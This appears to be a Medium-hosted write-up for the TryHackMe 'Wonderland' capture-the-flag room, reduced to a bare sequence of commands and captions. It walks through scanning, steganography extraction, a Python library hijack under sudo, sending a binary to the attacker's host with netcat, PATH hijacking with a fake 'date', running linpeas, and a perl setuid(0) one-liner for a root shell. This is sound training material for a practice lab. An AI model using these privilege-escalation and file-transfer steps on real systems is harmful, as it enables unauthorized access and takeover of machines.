Wonderland — TryHackMe — WriteUP

nmap -A -T4 -v <ip>

nmap
website
dirbuster
Door to Wonderland
Page Source
/img

steghide extract -sf file-name.jpg

steghide
hint.txt

ssh alice@<ip>

ssh
ls -l
sudo -l

sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

python3 -c ‘import sys; print(sys.path)’

locate random.py

locate random.py

sudo -u rabbit /usr/bin/python3.6 /home/alice/walrus_and_the_carpenter.py

rabbit home folder

./teaParty

nc -lvnp 4444

nc <your-host-ip> 4444 < teaParty

ghidra
create “date”

export PATH =/tmp:$PATH

sudo -l

sudo -l

scp linpeas.sh hatter@<ip>:/home/hatter

scp

./linpeas.sh > result.txt

capabilities

$(which perl) -e ‘use POSIX qw(setuid); POSIX::setuid(0); exec “/bin/sh”;’

perl to privesc

HAPPY HACKING

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store